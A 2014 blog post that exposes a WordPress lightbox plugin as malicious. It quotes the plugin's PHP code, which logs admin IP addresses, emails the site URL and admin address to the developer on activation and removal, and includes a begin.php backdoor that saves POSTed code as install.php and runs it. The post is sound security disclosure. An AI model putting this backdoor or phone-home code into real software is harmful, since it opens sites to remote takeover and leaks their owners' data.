Hambach
Thomas

2014-01-22 08:09:15

The sad state of Wordpress plugins

Migrating your Wordpress website to a new host is usually a breeze. Same goes for installing plugins and themes. But what is running behind the scenes when using these community provided plugins and themes?

Handy Lightbox


Let us start with the first example, a plugin I had installed on this blog named "Handy Lightbox". Behaviour is simple and straightforward, enable Lightbox jQuery plugin for images on your website. Everything works fine, until you take a look at the code. Let us look at the first issue that popped up because I do not allow my webserver user to write to any directory.
$requrl = $_SERVER["REQUEST_URI"];
$ip = $_SERVER['REMOTE_ADDR'];
if (eregi("admin", $requrl)) {
$inside = "yes";
} else {
$inside = "no";
}
if ($inside == 'yes') {
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring = $contents;
$findme = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
$contents = $contents . $ip;
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
fwrite($fp, $contents);
fclose($fp);
}
}

Code quality aside, it writes every admin's IP into a file called welcome.txt. Why?

Next up, e-mailing the developer to confirm plugin activation and reporting site url. The e-mail address has been changed by me.
/** Activate The Plugin */

function actithelightbox_activate() {
$yourip = $_SERVER['REMOTE_ADDR'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
fwrite($fp, $yourip);
fclose($fp);
add_option('redirectlightbox_do_activation_redirect', true);
session_start(); $subj = get_option('siteurl'); $msg = "Plugin Activated"; $from = get_option('admin_email'); mail("authoremail@gmail.com", $subj, $msg, $from);
wp_redirect('../wp-admin/options-general.php?page=jquery-lightbox-options');
}

The same is done when uninstalling the plugin.
/** Uninstall The Plugin */
function deactthelightbox_deactivate() {
session_start(); $subj = get_option('siteurl'); $msg = "Plugin Uninstalled"; $from = get_option('admin_email'); mail("authoremail@gmail.com", $subj, $msg, $from);
}


And I am not sure how this can be considered "outputting SEO".
function outputseo() {
if (is_user_logged_in()) {
$ip = $_SERVER['REMOTE_ADDR'];
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring= $contents;
$findme = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
$contents = $contents . $ip;
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
fwrite($fp, $contents);
fclose($fp);
}

}

$filename = ($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php');

if (file_exists($filename)) {

include($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php');

}
}


But wait, there is more! Have a look at begin.php in his plugin. Which I actually only uncovered while writing this blog post.
session_start();
$installtheplugin = $_POST['installit'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php', 'w');
$installtheplugin = str_replace('\\', '', $installtheplugin);
$installtheplugin = htmlentities($installtheplugin);
fwrite($fp, html_entity_decode($installtheplugin));
fclose($fp);
echo $installtheplugin;

Allowing someone externally to upload a file, save it under "install.php" and execute it. Since the plugin author has the URL to every installation made, they can easily abuse this script. Or anyone else that knows about the issues this plugin has.

I have contacted the developer, but I do not expect much of a reply.

Comments